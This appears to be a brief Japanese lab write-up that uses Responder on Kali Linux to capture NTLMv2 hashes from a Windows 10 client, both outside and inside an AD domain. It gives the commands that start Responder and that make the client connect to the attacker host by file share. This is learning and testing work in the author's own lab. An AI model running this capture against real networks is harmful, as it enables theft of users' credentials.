目的
responderというツールで、NTLMハッシュをキャプチャできると聞いたので実施してみました。クライアントがADドメインに所属している場合/していない場合の2パターンで実施します。
responderは、Kali Linuxにデフォルトで入っているので、それを使います。
www.kali.org
環境
- Kali Linux:2022.3
└ responder:3.1.3.0
- ADドメコン:Windows Server 2019
- クライアント:Windows10 21H2 Enterprise
NTLMハッシュのキャプチャ
クライアントがADドメインに所属していない場合
クライアントがADドメインに所属していない場合です。
実施手順
Kali Linuxでresponderを起動 ※root権限で実行する必要あり
$ sudo responder -I eth0 -v
クライアントが所属するドメイン名を確認→ドメインには所属していない
> systeminfo | findstr "ドメイン"
ドメイン: WORKGROUP
クライアントからresponderにファイル共有で接続する
> net use \\[Kali LinuxのIPアドレス]
結果
responderに表示された「NTLMv2-SSP Hash」の長い文字列がNTLMv2のハッシュ値らしい。
クライアントがADドメインに所属している場合
ADドメインに所属している端末はケルベロス認証を使うと聞くので、クライアントがADドメインに所属している場合に違いがあるのかも調べてみました。結果はクライアントがADドメインに所属していない場合と変わりませんでした。responderがADドメインに所属しているか、していないかでも結果は変わるかもしれません(今回はresponderはADドメインに所属していない)。
実施手順
Kali Linuxでresponderを起動 ※root権限で実行する必要あり
$ sudo responder -I eth0 -v
クライアントのADドメイン所属を確認
> whoami /UPN
user1@test.local
クライアントからresponderにファイル共有で接続する
> net use \\[Kali LinuxのIPアドレス]
結果
responderに表示された「NTLMv2-SSP Hash」の長い文字列がNTLMv2のハッシュ値らしい。